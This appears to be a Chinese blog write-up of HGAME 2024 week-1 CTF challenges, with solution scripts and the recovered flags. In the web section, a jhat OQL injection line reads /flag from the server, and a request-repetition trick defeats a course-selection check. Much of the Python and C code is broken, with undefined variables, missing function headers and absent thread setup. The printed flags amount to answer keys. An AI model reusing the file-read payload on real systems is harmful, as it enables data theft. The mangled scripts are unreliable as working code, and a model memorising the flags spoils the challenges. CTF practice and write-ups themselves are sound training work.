# HGAME 2024 WEEK1 WP

87 篇文章 61 订阅

### WEB

#### Select Courses

full还是1对吧，但是如果左边我故意让右边400几次，再发正常的包，多次重复这个步骤，莫名其妙full=0了

（例如下面这张图期间发了1次id=4+4,id=441，发了3次id=4）

#### jhat

select new java.io.BufferedReader(new java.io.InputStreamReader(new java.io.FileInputStream("/flag"))).readLine()

### RE

#### ezPYC

flag = [
87,
75,
71,
69,
83,
121,
83,
125,
117,
106,
108,
106,
94,
80,
48,
114,
100,
112,
112,
55,
94,
51,
112,
91,
48,
108,
119,
97,
115,
49,
112,
112,
48,
108,
100,
37,
124,
2]
c = [
1,
2,
3,
4]
#后略


#### ezUPX

upx -d ezUPX

xor 0x32

VIDAR{Wow!Y0u_kn0w_4_l1ttl3_0f_UPX!}

IDA直接打开就能看到

nc即可

### CRYPTO

#### 奇怪的图片

import time

from PIL import Image, ImageDraw, ImageFont
import random
import secrets

flag = "hgame{fake_flag}"

#生成随机RGB图片
def generate_random_image(width, height):
image = Image.new("RGB", (width, height), "white")
for x in range(width):
for y in range(height):
red = random.randint(0, 255)
green = random.randint(0, 255)
blue = random.randint(0, 255)
pixels[x, y] = (red, green, blue)
return image

#图像上画flag
def draw_text(image, width, height, token):
font_size = random.randint(16, 40)
font = ImageFont.truetype("arial.ttf", font_size)
text_color = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
x = random.randint(0, width - font_size * len(token))
y = random.randint(0, height - font_size)
draw = ImageDraw.Draw(image)
draw.text((x, y), token, font=font, fill=text_color)
return image

#异或两张图RGB
def xor_images(image1, image2):
if image1.size != image2.size:
raise ValueError("Images must have the same dimensions.")
xor_image = Image.new("RGB", image1.size)
for x in range(image1.size[0]):
for y in range(image1.size[1]):
r1, g1, b1 = pixels1[x, y]
r2, g2, b2 = pixels2[x, y]
xor_pixels[x, y] = (r1 ^ r2, g1 ^ g2, b1 ^ b2)
return xor_image

#生成与随机token当文件名
def generate_unique_strings(n, length):
unique_strings = set()
while len(unique_strings) < n:
random_string = secrets.token_hex(length // 2)
return list(unique_strings)

random_strings = generate_unique_strings(len(flag), 8)

current_image = generate_random_image(120, 80)
key_image = generate_random_image(120, 80)

def random_time(image, name):
time.sleep(random.random())
image.save(".\\png_out\\{}.png".format(name))

for i in range(len(flag)):
current_image = draw_text(current_image, 120, 80, flag[i])


key^a1 = a2
key^b1 = b2

a2^b2 = a1^b1

from PIL import Image, ImageDraw, ImageFont

def xor_images(image1, image2):
if image1.size != image2.size:
raise ValueError("Images must have the same dimensions.")
xor_image = Image.new("RGB", image1.size)
for x in range(image1.size[0]):
for y in range(image1.size[1]):
r1, g1, b1 = pixels1[x, y]
r2, g2, b2 = pixels2[x, y]
xor_pixels[x, y] = (r1 ^ r2, g1 ^ g2, b1 ^ b2)
return xor_image

import os
DL = os.listdir('./')
NDL = [file for file in DL if ".png" in file]
print(NDL)
print(len(NDL))
for j in range(len(NDL)):
image1 = Image.open(NDL[j])
dr = NDL[j].split(".png")[0]
os.mkdir(f'../{dr}')
for i in range(len(NDL)):
image2 = Image.open(NDL[i])
image3 = xor_images(image1,image2)
image3.save(f'../{dr}/{i}.png')
image3.close()
image2.close()


#### ezRSA

leak1=pow(p,q,n)
leak2=pow(q,p,n)


import gmpy2
import binascii

e = 65537
p = 149127170073611271968182576751290331559018441805725310426095412837589227670757540743929865853650399839102838431507200744724939659463200158012469676979987696419050900842798225665861812331113632892438742724202916416060266581590169063867688299288985734104127632232175657352697898383441323477450658179727728908669
q = 116122992714670915381309916967490436489020001172880644167179915467021794892927977272080596641785569119134259037522388335198043152206150259103485574558816424740204736215551933482583941959994625356581201054534529395781744338631021423703171146456663432955843598548122593308782245220792018716508538497402576709461
c=10529481867532520034258056773864074017027019578041866245400647840230251661652999709715919620810933437191661180003295923273655675729588558899592524235622728816065501918076120812236580344991140980991532347991252705288633014913479970610056845543523591324177567061948922552275235486615514913932125436543991642607028689762693617305246716492783116813070355512606971626645594961850567586340389705821314842096465631886812281289843132258131809773797777049358789182212570606252509790830994263132020094153646296793522975632191912463919898988349282284972919932761952603379733234575351624039162440021940592552768579639977713099971
n = p*q

L = (p-1)*(q-1)
d = gmpy2.invert(e,L)
m = gmpy2.powmod(c,d,n)

print(binascii.unhexlify(hex(m)[2:]))
#hgame{F3rmat_l1tt1e_the0rem_is_th3_bas1s}


#### ezMath

https://www.wxjk.net/other/23395136.html

#sage
numTry = 1500
def solve_pell(N, numTry):
cf = continued_fraction(sqrt(N))
for i in range(numTry):
denom = cf.denominator(i)
numer = cf.numerator(i)
if numer^2 - N * denom^2 == 1:
return numer, denom
return None, None

x,y = solve_pell(114514,numTry)
print(y)


9037815138660369922198555785216162916412331641365948545459353586895717702576049626533527779108680


from Crypto.Cipher import AES
from libnum import n2s as long_to_bytes
return x+b'\x00'*(16-len(x)%16)
y = 9037815138660369922198555785216162916412331641365948545459353586895717702576049626533527779108680

key_bytes = long_to_bytes(y)

enc = b"\xce\xf1\x94\x84\xe9m\x88\x04\xcb\x9ad\x9e\x08b\xbf\x8b\xd3\r\xe2\x81\x17g\x9c\xd7\x10\x19\x1a\xa6\xc3\x9d\xde\xe7\xe0h\xed/\x00\x95tz)1\\\t8:\xb1,U\xfe\xdec\xf2h\xab\xe5'\x93\xf8\xde\xb2\x9a\x9a"

decrypted_flag = cipher.decrypt(enc)

print(decrypted_flag)
#b'hgame{G0od!_Yo3_k1ow_C0ntinued_Fra3ti0ns!!!!!!!}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'


#### ezPRNG

c语言多线程爆破(爆破完约6小时，针对此题耗时约2小时)

#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define SEARCH_SPACE 4294967295U

uint32_t PRNG(uint32_t R, uint32_t mask) {
uint32_t nextR = (R << 1) & 0xffffffff;
uint32_t i = (R & mask) & 0xffffffff;
uint32_t nextbit = 0;
while (i != 0) {
nextbit ^= (i % 2);
i = i / 2;
}
nextR ^= nextbit;
return nextR;
}

char* outputs[4] = {
"1111110110111011110000101011010001000111111001111110100101000011110111",
"0010000000001010111100001100011101111101111000100100111010101110010110",
"1110110110010001011100111110111110111001111101010011001111100100001000",
"0001101010101010100001001001100010000101010100001010001000100011101100"
};
char buffer[71];

for (int i = 0; i < 4; i++) {
for (uint32_t R = start; R <= end; R++) {
uint32_t currentR = R;
for (int j = 0; j < 70; j++) {
buffer[j] = (currentR & 1) + '0';
}
buffer[70] = '\0';

if (strncmp(buffer, outputs[i], 70) == 0) {
break;
}
if (R % 100000000 == 0) {
printf("Progress: %u\n", R);}
}
}

return NULL;
}

int main() {

for (int i = 0; i < NUM_THREADS; i++) {
}

for (int i = 0; i < NUM_THREADS; i++) {
}

printf("Search completed.\n");
return 0;
}


### MISC

#### SignIn

hgame{WOW_GREAT_YOU_SEE_IT_WONDERFUL}


#### 希儿希儿希尔

import binascii
import struct
import sys
file = input("图片地址：")
data: bytearray = bytearray(fr[0x0c:0x1d])
crc32key = eval('0x'+str(binascii.b2a_hex(fr[0x1d:0x21]))[2:-1])
n = 4095
for w in range(n):
width = bytearray(struct.pack('>i', w))
for h in range(n):
height = bytearray(struct.pack('>i', h))
for x in range(4):
data[x+4] = width[x]
data[x+8] = height[x]
crc32result = binascii.crc32(data) & 0xffffffff
if crc32result == crc32key:
print(width,height)
newpic = bytearray(fr)
for x in range(4):
newpic[x+16] = width[x]
newpic[x+20] = height[x]
fw = open(file+'.png','wb')
fw.write(newpic)
fw.close
file.close()


hgame{DISAPPEARINTHESEAOFBUTTERFLY}`

• 10
点赞
• 34
收藏
觉得还不错? 一键收藏
• 3
评论
02-13 762
02-11 1932
02-06 1299
02-08 1153
02-06 1304
04-24
05-30
01-15
01-08 1万+
05-29 1万+

### “相关推荐”对你有帮助么？

• 非常没帮助
• 没帮助
• 一般
• 有帮助
• 非常有帮助

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。